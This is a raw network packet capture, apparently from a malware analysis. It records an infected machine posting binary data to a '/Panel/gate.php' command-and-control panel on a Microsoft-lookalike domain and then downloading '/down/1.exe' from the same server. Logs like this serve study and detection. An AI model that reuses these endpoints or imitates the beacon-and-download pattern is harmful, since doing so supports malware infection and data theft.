E..4F.@…q….f;.D….P…..p.s………..

E..(Gq@…p….f;.D….PF..o..}^P…”………
2016-11-15 19:21:36.592725 IP 192.168.1.102.53491 > 59.188.68.200.80: Flags [P.], seq 0:272, ack 1, win 256, length 272: HTTP: POST /Panel/gate.php HTTP/1.0
E..8Gr@…o….f;.D….PF..o..}^P….|..POST /Panel/gate.php HTTP/1.0
Host: a.microsoftsup.com
Accept: */*
Accept-Encoding: identity, *;q=0
Content-Length: 337
Connection: close
Content-Type: application/octet-stream
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)


E..(Gw@…p….f;.D….P^……5P………….
2016-11-15 19:21:37.954398 IP 192.168.1.102.53492 > 59.188.68.200.80: Flags [P.], seq 0:183, ack 1, win 256, length 183: HTTP: GET /down/1.exe HTTP/1.0
E…Gx@…p….f;.D….P^……5P…….GET /down/1.exe HTTP/1.0
Host: down.microsoftsup.com
Accept: */*
Accept-Encoding: identity, *;q=0
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)